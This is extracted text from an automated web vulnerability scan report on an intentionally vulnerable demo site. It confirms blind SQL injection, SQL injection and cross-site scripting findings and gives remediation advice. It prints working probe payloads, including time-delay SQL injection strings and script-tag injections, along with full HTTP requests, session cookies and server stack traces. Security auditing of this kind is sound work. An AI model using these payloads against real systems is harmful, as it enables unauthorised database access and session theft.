ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
bundles StackTraceDisclosure(ASPNET)
No
Images OPTIONSMethodEnabled
Yes
ImagesMakes ForbiddenResource
Yes
Make InternalServerError
Yes
Make1 orderby GET BlindSQLInjection
Yes
orderby GET SQLInjection
Yes
Out-of-dateVersion(MicrosoftSQLServer)
No
DatabaseErrorMessageDisclosure
No
orderby GET [Possible]SQLInjection
No
DatabaseDetected(MicrosoftSQLServer)
Yes
Make2 orderby GET BlindSQLInjection
Yes
orderby GET SQLInjection
Yes
orderby GET [Possible]SQLInjection
No
Make3 orderby GET BlindSQLInjection
Yes
orderby GET SQLInjection
Yes
orderby GET [Possible]SQLInjection
No
robotstxt RobotstxtDetected
Yes
Search searchTerm GET Cross-siteScripting
Yes
Supercar3 PermanentCross-siteScripting
Yes
[Possible]InternalPathDisclosure(nix)
No
[Possible]InternalPathDisclosure(Windows)
No
SupercarLeaderboard orderBy GET BlindSQLInjection
Yes
orderBy GET SQLInjection
Yes
3 57
4 57
5 TOTALCRITICAL
CONFIRMED
5
1 Blind SQL InjectionNetsparkeridentifiedablindSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabaseInthesetestsSQLinjectionwasnotobviousbutthedifferentresponsesfromthepagebasedontheinjectiontestallowedustoidentifyandconfirmtheSQLinjection
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocatethealldynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM change alllegacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
11 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
5 57
RequestGET Make1orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230021 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtNissans - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
12 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527-
ParametersParameter Type Value
orderBy GET 1 WAITFOR DELAY 0025--
asc GET false
RequestGET SupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527--ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
6 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 231609 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2885Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtSupercar Leaderboard - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
13 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make3orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
7 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230647 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtPaganis - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
14 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make2orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
8 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230334 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtMcLarens - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
15 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST ) WAITFOR DELAY 0025--
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 68Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=27)+WAITFOR+DELAY+2703a03a2527--
ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232122 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
9 57
5 TOTALCRITICAL
CONFIRMED
5
2 SQL InjectionNetsparkeridentifiedanSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingtypeofattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM changeall legacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
